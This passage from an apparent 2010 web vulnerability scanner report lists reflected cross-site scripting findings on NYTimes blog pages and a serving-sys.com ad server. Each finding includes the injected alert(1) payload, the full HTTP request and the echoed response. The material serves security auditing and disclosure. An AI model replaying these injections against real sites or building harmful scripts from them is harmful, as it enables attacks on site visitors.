Content-Type: text/html; charset=UTF-8
Content-Length: 58410
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/metropolitan-opera72636\"><script>alert(1)</script>fe25915fda2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.58. http://artsbeat.blogs.nytimes.com/tag/rubicon/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /tag/rubicon/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8df76"><script>alert(1)</script>36a7ef473d7 was submitted in the REST URL parameter 2. This input was echoed as 8df76\"><script>alert(1)</script>36a7ef473d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/rubicon8df76"><script>alert(1)</script>36a7ef473d7/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:39 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58267
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/rubicon8df76\"><script>alert(1)</script>36a7ef473d7&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.59. http://artsbeat.blogs.nytimes.com/tag/the-nutcracker-chronicles/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /tag/the-nutcracker-chronicles/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8d81"><script>alert(1)</script>c72ce13dac8 was submitted in the REST URL parameter 2. This input was echoed as c8d81\"><script>alert(1)</script>c72ce13dac8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/the-nutcracker-chroniclesc8d81"><script>alert(1)</script>c72ce13dac8/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:27 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58501
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/the-nutcracker-chroniclesc8d81\"><script>alert(1)</script>c72ce13dac8&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.60. http://artsbeat.blogs.nytimes.com/tag/today/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /tag/today/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de2b9"><script>alert(1)</script>a5cf14ef85b was submitted in the REST URL parameter 2. This input was echoed as de2b9\"><script>alert(1)</script>a5cf14ef85b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/todayde2b9"><script>alert(1)</script>a5cf14ef85b/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58241
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/todayde2b9\"><script>alert(1)</script>a5cf14ef85b&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.61. http://artsbeat.blogs.nytimes.com/tag/tony-scott/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /tag/tony-scott/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 759e8"><script>alert(1)</script>ffce1e028bf was submitted in the REST URL parameter 2. This input was echoed as 759e8\"><script>alert(1)</script>ffce1e028bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/tony-scott759e8"><script>alert(1)</script>ffce1e028bf/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:27 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58306
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/tony-scott759e8\"><script>alert(1)</script>ffce1e028bf&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.62. http://artsbeat.blogs.nytimes.com/tag/unstoppable/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /tag/unstoppable/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57ebc"><script>alert(1)</script>69d455abf66 was submitted in the REST URL parameter 2. This input was echoed as 57ebc\"><script>alert(1)</script>69d455abf66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/unstoppable57ebc"><script>alert(1)</script>69d455abf66/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58319
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/unstoppable57ebc\"><script>alert(1)</script>69d455abf66&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.63. http://artsbeat.blogs.nytimes.com/tag/week-in-culture-pictures/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /tag/week-in-culture-pictures/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46998"><script>alert(1)</script>93dbc148a41 was submitted in the REST URL parameter 2. This input was echoed as 46998\"><script>alert(1)</script>93dbc148a41 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/week-in-culture-pictures46998"><script>alert(1)</script>93dbc148a41/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58488
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/week-in-culture-pictures46998\"><script>alert(1)</script>93dbc148a41&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.64. http://atwar.blogs.nytimes.com/2010/11/12/the-state-of-schools-in-swat/ [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://atwar.blogs.nytimes.com
Path: /2010/11/12/the-state-of-schools-in-swat/
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 810f2"><script>alert(1)</script>3ec6b036ff6 was submitted in the src parameter. This input was echoed as 810f2\"><script>alert(1)</script>3ec6b036ff6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/the-state-of-schools-in-swat/?src=twr810f2"><script>alert(1)</script>3ec6b036ff6 HTTP/1.1
Host: atwar.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 01:59:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://atwar.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51402
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... SIDE&query=qstring&keywords=Iraq+War;Afghanistan+War;Baghdad;Kandahar;Kabul;Pakistan;Swat+Valley;U.S.+military;troops;Taliban;Al+Qaeda;Shiite;Sunni+and+Kurd;af-pak;education;girls;pakistan;swat&src=twr810f2\"><script>alert(1)</script>3ec6b036ff6"> ...[SNIP]...
3.65. http://bits.blogs.nytimes.com/2010/11/12/facebook-to-start-an-e-mail-service/ [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://bits.blogs.nytimes.com
Path: /2010/11/12/facebook-to-start-an-e-mail-service/
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 720b9"><script>alert(1)</script>0cd621483e2 was submitted in the src parameter. This input was echoed as 720b9\"><script>alert(1)</script>0cd621483e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/facebook-to-start-an-e-mail-service/?src=twr720b9"><script>alert(1)</script>0cd621483e2 HTTP/1.1
Host: bits.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 01:59:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://bits.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73004
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... ,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Technology;Start-Ups;Internet;Enterprise;Gadgets;company-news;e-mail;facebook;internet;social-networking&src=twr720b9\"><script>alert(1)</script>0cd621483e2"> ...[SNIP]...
3.66. http://bs.serving-sys.com/BurstingPipe/adServer.bs [h parameter]
Summary
Severity: High
Confidence: Certain
Host: http://bs.serving-sys.com
Path: /BurstingPipe/adServer.bs
Issue detail
The value of the h request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 550d0%3balert(1)//2f013fc219c was submitted in the h parameter. This input was echoed as 550d0;alert(1)//2f013fc219c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300&h=250550d0%3balert(1)//2f013fc219c&ord=2010.11.13.01.44.23&ucm=true&z=0 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bs.serving-sys.com
Proxy-Connection: Keep-Alive
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MFP0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1
Response
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Connection: close
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHH0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Vary: Accept-Encoding
Content-Length: 1939
var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index ...[SNIP]... </IMG>");var ebO = new Object();ebO.w=300;ebO.h=250550d0;alert(1)//2f013fc219c;ebO.pli=1922996;ebO.ai=4005086;ebO.ci=123305;ebO.pi=0;ebO.d=0;ebO.sms="ds.serving-sys.com/BurstingScript/";ebO.bs="bs.serving-sys.com";ebO.p="";ebO.tn="ExpBanner";ebO.hl=30;ebO.au="Site-2452/Type-11/4 ...[SNIP]...
3.67. http://bs.serving-sys.com/BurstingPipe/adServer.bs [w parameter]
Summary
Severity: High
Confidence: Certain
Host: http://bs.serving-sys.com
Path: /BurstingPipe/adServer.bs
Issue detail
The value of the w request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 416d8%3balert(1)//ad7018bc358 was submitted in the w parameter. This input was echoed as 416d8;alert(1)//ad7018bc358 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300416d8%3balert(1)//ad7018bc358&h=250&ord=2010.11.13.01.44.23&ucm=true&z=0 HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: bs.serving-sys.com Proxy-Connection: Keep-Alive Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MFP0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Connection: close Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI" X-Powered-By: ASP.NET Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/ Set-Cookie: A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHH0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ Vary: Accept-Encoding Content-Length: 1939
var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index ...[SNIP]... </IMG>");var ebO = new Object();ebO.w=300416d8;alert(1)//ad7018bc358;ebO.h=250;ebO.pli=1922996;ebO.ai=4005086;ebO.ci=123305;ebO.pi=0;ebO.d=0;ebO.sms="ds.serving-sys.com/BurstingScript/";ebO.bs="bs.serving-sys.com";ebO.p="";ebO.tn="ExpBanner";ebO.hl=30;ebO.au="Site-2452 ...[SNIP]...
3.68. http://bs.serving-sys.com/BurstingPipe/adServer.bs [z parameter]
Summary
Severity: High
Confidence: Certain
Host: http://bs.serving-sys.com
Path: /BurstingPipe/adServer.bs
Issue detail
The value of the z request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload de13f%3balert(1)//59f87800f7c was submitted in the z parameter. This input was echoed as de13f;alert(1)//59f87800f7c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300&h=250&ord=2010.11.13.01.44.23&ucm=true&z=0de13f%3balert(1)//59f87800f7c HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: bs.serving-sys.com Proxy-Connection: Keep-Alive Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MFP0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Connection: close Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI" X-Powered-By: ASP.NET Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/ Set-Cookie: A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHH0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: 